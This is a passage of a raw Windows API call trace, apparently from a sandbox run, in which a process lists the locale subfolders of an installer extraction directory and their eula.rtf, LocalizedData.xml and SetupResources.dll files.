ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.809] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.810] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.810] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.810] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.810] FindClose (in: hFindFile=0x604238 | out: hFindFile=0x604238) returned 1 [0195.810] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.810] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0195.810] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045b8 [0195.810] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.810] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.811] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.811] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.811] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.811] FindClose (in: hFindFile=0x6045b8 | out: hFindFile=0x6045b8) returned 1 [0195.811] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.811] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0195.811] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0195.812] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.812] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.812] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.812] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.812] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.812] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0195.812] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.812] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0195.812] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6042f8 [0195.901] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.901] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xcf2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.901] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.902] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.902] FindNextFileW (in: hFindFile=0x6042f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.902] FindClose (in: hFindFile=0x6042f8 | out: hFindFile=0x6042f8) returned 1 [0195.902] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.902] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0195.902] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0195.910] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.911] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.911] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.911] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.911] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.911] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0195.911] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.911] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0195.911] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604678 [0195.915] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.915] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x22ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.916] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.916] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0195.916] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0195.916] FindClose (in: hFindFile=0x604678 | out: hFindFile=0x604678) returned 1 [0195.916] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0195.916] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0195.917] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604938 [0195.920] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.920] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0195.921] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0195.921] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, 